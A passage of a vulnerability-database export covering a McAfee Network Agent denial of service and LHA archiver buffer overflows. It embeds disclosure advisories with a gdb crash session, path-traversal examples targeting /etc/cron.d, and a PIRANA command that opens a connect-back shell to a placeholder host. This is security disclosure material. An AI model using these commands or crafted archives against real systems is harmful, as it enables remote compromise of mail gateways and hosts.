Vulnerabilites related to mcafee - virusscan
var-200610-0251
Vulnerability from variot
McAfee Network Agent (mcnasvc.exe) 1.0.178.0, as used by multiple McAfee products possibly including Internet Security Suite, Personal Firewall Plus, and VirusScan, allows remote attackers to cause a denial of service (agent crash) via a long packet, possibly because of an invalid string position field value. NOTE: some of these details are obtained from third party information. McAfee Network Agent is prone to a remote denial-of-service vulnerability because the service fails to properly handle excessive network data. Exploiting this issue may cause the affected application to crash, denying service to legitimate users. Version 1.0.178.0 is vulnerable; other versions may also be affected. Remote attackers may use this vulnerability to perform denial of service attacks on services.
Want to work within IT-Security?
Secunia is expanding its team of highly skilled security experts. We will help with relocation and obtaining a work permit. This can be exploited to crash the service by sending a specially crafted message with an invalid value in the string position field.
SOLUTION: Restrict access to the service.
PROVIDED AND/OR DISCOVERED BY: JAAScois
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200610-0251",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "network agent",
"scope": "eq",
"trust": 2.7,
"vendor": "mcafee",
"version": "1.0.178.0"
},
{
"model": "internet security suite",
"scope": null,
"trust": 1.4,
"vendor": "mcafee",
"version": null
},
{
"model": "personal firewall plus",
"scope": null,
"trust": 1.4,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan",
"scope": null,
"trust": 1.4,
"vendor": "mcafee",
"version": null
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "*"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "*"
},
{
"model": "personal firewall plus",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "*"
}
],
"sources": [
{
"db": "BID",
"id": "20496"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-002292"
},
{
"db": "CNNVD",
"id": "CNNVD-200610-367"
},
{
"db": "NVD",
"id": "CVE-2006-5417"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:mcafee:internet_security_suite",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:network_agent",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:personal_firewall_plus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:virusscan",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2006-002292"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "JAAScois www.jaascois.com)",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200610-367"
}
],
"trust": 0.6
},
"cve": "CVE-2006-5417",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2006-5417",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-21525",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2006-5417",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2006-5417",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-200610-367",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-21525",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-21525"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-002292"
},
{
"db": "CNNVD",
"id": "CNNVD-200610-367"
},
{
"db": "NVD",
"id": "CVE-2006-5417"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "McAfee Network Agent (mcnasvc.exe) 1.0.178.0, as used by multiple McAfee products possibly including Internet Security Suite, Personal Firewall Plus, and VirusScan, allows remote attackers to cause a denial of service (agent crash) via a long packet, possibly because of an invalid string position field value. NOTE: some of these details are obtained from third party information. McAfee Network Agent is prone to a remote denial-of-service vulnerability because the service fails to properly handle excessive network data. \nExploiting this issue may cause the affected application to crash, denying service to legitimate users. \nVersion 1.0.178.0 is vulnerable; other versions may also be affected. Remote attackers may use this vulnerability to perform denial of service attacks on services. \n\n----------------------------------------------------------------------\n\nWant to work within IT-Security?\n\nSecunia is expanding its team of highly skilled security experts. \nWe will help with relocation and obtaining a work permit. This can be\nexploited to crash the service by sending a specially crafted message\nwith an invalid value in the string position field. \n\nSOLUTION:\nRestrict access to the service. \n\nPROVIDED AND/OR DISCOVERED BY:\nJAAScois\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-5417"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-002292"
},
{
"db": "BID",
"id": "20496"
},
{
"db": "VULHUB",
"id": "VHN-21525"
},
{
"db": "PACKETSTORM",
"id": "50888"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2006-5417",
"trust": 2.5
},
{
"db": "BID",
"id": "20496",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "22371",
"trust": 1.8
},
{
"db": "SREASON",
"id": "1750",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1017057",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2006-002292",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200610-367",
"trust": 0.7
},
{
"db": "XF",
"id": "29501",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20061012 MCAFEE NETWORK AGENT (MCNASVC.EXE) REMOTE DOS",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-21525",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "50888",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-21525"
},
{
"db": "BID",
"id": "20496"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-002292"
},
{
"db": "PACKETSTORM",
"id": "50888"
},
{
"db": "CNNVD",
"id": "CNNVD-200610-367"
},
{
"db": "NVD",
"id": "CVE-2006-5417"
}
]
},
"id": "VAR-200610-0251",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-21525"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T22:54:12.559000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Internet Security",
"trust": 0.8,
"url": "http://home.mcafee.com/store/internet-security"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2006-002292"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-5417"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/20496"
},
{
"trust": 1.7,
"url": "http://securitydot.net/xpl/exploits/vulnerabilities/articles/1659/exploit.html"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/id?1017057"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/22371"
},
{
"trust": 1.7,
"url": "http://securityreason.com/securityalert/1750"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/448546/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29501"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5417"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2006-5417"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/29501"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/448546/100/0/threaded"
},
{
"trust": 0.3,
"url": "http://www.mcafee.com/"
},
{
"trust": 0.3,
"url": "/archive/1/448546"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/22371/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/9052/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/11210/"
},
{
"trust": 0.1,
"url": "http://secunia.com/hardcore_disassembler_and_reverse_engineer/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/267/"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-21525"
},
{
"db": "BID",
"id": "20496"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-002292"
},
{
"db": "PACKETSTORM",
"id": "50888"
},
{
"db": "CNNVD",
"id": "CNNVD-200610-367"
},
{
"db": "NVD",
"id": "CVE-2006-5417"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-21525"
},
{
"db": "BID",
"id": "20496"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-002292"
},
{
"db": "PACKETSTORM",
"id": "50888"
},
{
"db": "CNNVD",
"id": "CNNVD-200610-367"
},
{
"db": "NVD",
"id": "CVE-2006-5417"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-10-20T00:00:00",
"db": "VULHUB",
"id": "VHN-21525"
},
{
"date": "2006-10-12T00:00:00",
"db": "BID",
"id": "20496"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-002292"
},
{
"date": "2006-10-13T20:38:12",
"db": "PACKETSTORM",
"id": "50888"
},
{
"date": "2006-10-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200610-367"
},
{
"date": "2006-10-20T14:07:00",
"db": "NVD",
"id": "CVE-2006-5417"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-17T00:00:00",
"db": "VULHUB",
"id": "VHN-21525"
},
{
"date": "2006-10-13T18:59:00",
"db": "BID",
"id": "20496"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-002292"
},
{
"date": "2006-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200610-367"
},
{
"date": "2024-11-21T00:19:09.347000",
"db": "NVD",
"id": "CVE-2006-5417"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200610-367"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Internet Security Suite Such as McAfee Service disruption in products (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2006-002292"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200610-367"
}
],
"trust": 0.6
}
}
var-200408-0140
Vulnerability from variot
Multiple stack-based buffer overflows in the get_header function in header.c for LHA 1.14, as used in products such as Barracuda Spam Firewall, allow remote attackers or local users to execute arbitrary code via long directory or file names in an LHA archive, which triggers the overflow when testing or extracting the archive. The first issues reported have been assigned the CVE candidate identifier (CAN-2004-0234). LHA is reported prone to two stack-based buffer-overflow vulnerabilities. An attacker may exploit these vulnerabilities to execute supplied instructions with the privileges of the user who invoked the affected LHA utility. The second set of issues has been assigned CVE candidate identifier (CAN-2004-0235). In addition to the buffer-overflow vulnerabilities that were reported, LHA has been reported prone to several directory-traversal issues. An attacker may likely exploit these directory-traversal vulnerabilities to corrupt/overwrite files in the context of the user who is running the affected LHA utility. NOTE: Reportedly, this issue may also cause a denial-of-service condition in the ClearSwift MAILsweeper products due to code dependency. Update: Many F-Secure Anti-Virus products are also reported prone to the buffer-overflow vulnerability. LHa is a console-based decompression program. Carefully constructed file or directory names can execute arbitrary commands with process privileges. Attackers can build simple packages that corrupt system files when LHA operates.
These vulnerabilities are related to: SA11510 SA19002
Successful exploitation allows execution of arbitrary code. ------------------------------------------------------------------------
LHa buffer overflows and directory traversal problems
PROGRAM: LHa (Unix version) VENDOR: various people VULNERABLE VERSIONS: 1.14d to 1.14i 1.17 (Linux binary) possibly others IMMUNE VERSIONS: 1.14i with my patch applied 1.14h with my patch applied LHa 1.14: http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm http://www2m.biglobe.ne.jp/~dolphin/lha/prog/ LHa 1.17: http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/ REFERENCES: CAN-2004-0234 (buffer overflows) CAN-2004-0235 (directory traversal)
- DESCRIPTION *
LHa is a console-based program for packing and unpacking LHarc archives.
It is one of the packages in Red Hat Linux, Fedora Core, SUSE Linux, Debian GNU/Linux (non-free), Mandrakelinux, Slackware Linux, Gentoo Linux, Yellow Dog Linux, Conectiva Linux and ALT Linux. It is also included in the port/package collections for FreeBSD, OpenBSD and NetBSD.
- OVERVIEW *
LHa has two stack-based buffer overflows and two directory traversal problems. They can be abused by malicious people in many different ways: some mail virus scanners require LHa and run it automatically on attached files in e-mail messages. Some web applications allow uploading and unpacking of LHarc archives. Some people set up their web browsers to start LHa automatically after downloading an LHarc archive. Finally, social engineering is probably quite effective in this case. The cause of the problem is the function get_header() in header.c. This function first reads the lengths of filenames or directory names from the archive, and then it reads that many bytes to a char array (one for filenames and one for directory names) without checking if the array is big enough.
By exploiting this bug, you get control over several registers including EIP, as you can see in this session capture:
$ lha t buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Segmentation fault $ lha x buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Segmentation fault $ gdb lha GNU gdb Red Hat Linux (5.3post-0.20021129.18rh) Copyright 2003 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux-gnu"... (gdb) r x buf_oflow.lha Starting program: /usr/bin/lha x buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU
Program received signal SIGSEGV, Segmentation fault. 0x55555555 in ?? () (gdb) bt
0 0x55555555 in ?? ()
Cannot access memory at address 0x55555555 (gdb) i r eax 0x4001e4a0 1073865888 ecx 0xffffffe0 -32 edx 0x24 36 ebx 0x55555555 1431655765 esp 0xbfffdd50 0xbfffdd50 ebp 0x55555555 0x55555555 esi 0x55555555 1431655765 edi 0x55555555 1431655765 eip 0x55555555 0x55555555 eflags 0x210282 2163330 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x33 51 (gdb) r t buf_oflow.lha The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /usr/bin/lha t buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU
Program received signal SIGSEGV, Segmentation fault. 0x55555555 in ?? () (gdb) bt
0 0x55555555 in ?? ()
Cannot access memory at address 0x55555555 (gdb) i r eax 0x4001e4a0 1073865888 ecx 0xffffffe0 -32 edx 0x24 36 ebx 0x55555555 1431655765 esp 0xbfffe6d0 0xbfffe6d0 ebp 0x55555555 0x55555555 esi 0x55555555 1431655765 edi 0x55555555 1431655765 eip 0x55555555 0x55555555 eflags 0x210286 2163334 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x33 51 (gdb) q The program is running. Exit anyway? (y or n) y $
b) two directory traversal problems
LHa has directory traversal problems, both with absolute paths and relative paths. There is no protection against relative paths at all, so you can simply use the lha binary to create an archive with paths like "../../../../../etc/cron.d/evil". There is some simple protection against absolute paths, namely skipping the first character if it is a slash, but again you can simply use the binary to create archives with paths like "//etc/cron.d/evil".
- ATTACHED FILES *
I have written a patch against version 1.14i that corrects all four problems. The patch is included as an attachment, together with some test archives.
- TIMELINE *
18 Apr: contacted the vendor-sec list and the LHa 1.14 author 18 Apr: tried to contact the LHa 1.17 author with a web form and a guessed e-mail address which bounced 19 Apr: reply from the vendor-sec list with CVE references 30 Apr: Red Hat released their advisory 01 May: I release this advisory
// Ulf Harnhammar Advogato diary :: http://www.advogato.org/person/metaur/ idiosynkratisk (Swedish electropop zine) :: http://idiosynkratisk.tk/ Debian Security Audit Project :: http://shellcode.org/Audit/
.
TITLE: Zoo "fullpath()" File Name Handling Buffer Overflow
SECUNIA ADVISORY ID: SA19002
VERIFY ADVISORY: http://secunia.com/advisories/19002/
CRITICAL: Moderately critical
IMPACT: DoS, System access
WHERE:
From remote
SOFTWARE: zoo 2.x http://secunia.com/product/8297/
DESCRIPTION: Jean-S\xe9bastien Guay-Leroux has discovered a vulnerability in zoo, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially to compromise a user's system. This can be exploited to cause a buffer overflow when a specially-crafted ZOO archive containing a file with an overly long file and directory name is processed (e.g. listing archive contents or adding new files to the archive).
The vulnerability has been confirmed in version 2.10. Other versions may also be affected.
SOLUTION: Restrict use to trusted ZOO archives.
PROVIDED AND/OR DISCOVERED BY: Jean-S\xe9bastien Guay-Leroux
ORIGINAL ADVISORY: http://www.guay-leroux.com/projects/zoo-advisory.txt
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. Topic: Barracuda LHA archiver security bug leads to remote compromise
Announced: 2006-04-03 Product: Barracuda Spam Firewall Vendor: http://www.barracudanetworks.com/ Impact: Remote shell access Affected product: Barracuda with firmware < 3.3.03.022 AND spamdef < 3.0.10045 Credits: Jean-S\xe9bastien Guay-Leroux CVE ID: CVE-2004-0234
I. BACKGROUND
The Barracuda Spam Firewall is an integrated hardware and software solution for complete protection of your email server. It provides a powerful, easy to use, and affordable solution to eliminating spam and virus from your organization by providing the following protection:
- Anti-spam
- Anti-virus
- Anti-spoofing
- Anti-phishing
- Anti-spyware (Attachments)
- Denial of Service
II. DESCRIPTION
When building a special LHA archive with long filenames in it, it is possible to overflow a buffer on the stack used by the program and seize control of the program.
Since this component is used when scanning an incoming email, remote compromise is possible by sending a simple email with the specially crafted LHA archive attached to the Barracuda Spam Firewall.
You do NOT need to have remote administration access (on port 8000) for successfull exploitation.
For further informations about the details of the bugs, you can consult OSVDB
5753 and #5754 .
III. IMPACT
Gain shell access to the remote Barracuda Spam Firewall
IV. PROOF OF CONCEPT
Using the PIRANA framework, available at http://www.guay-leroux.com , it is possible to test the Barracuda Spam Firewall against the LHA vulnerability.
By calling PIRANA the way it is described below, you will get a TCP connect back shell on IP address 1.2.3.4 and port 1234:
perl pirana.pl -e 0 -h barracuda.vulnerable.com -a postmaster -s 0 -l 1.2.3.4 \ -p 1234 -z -c 1 -d 1
V. SOLUTION
Barracuda Networks pushed an urgent critical patch in spamdef #3.0.10045, available March 24th 2006.
They also published an official patch in firmware #3.3.03.022, available April 3rd 2006.
It is recommended to update to firmware #3.3.03.022 .
VI. CREDITS
Ulf Harnhammar who found the original LHA flaw.
Jean-S\xe9bastien Guay-Leroux who conducted further research on the bug and produced exploitation plugin for the PIRANA framework.
VII. REFERENCES
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0234
VIII. HISTORY
2006-03-02 : Disclosure of vulnerability to Barracuda Networks 2006-03-02 : Acknowledgement of the problem 2006-03-24 : Problem fixed 2006-04-03 : Advisory disclosed to public
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
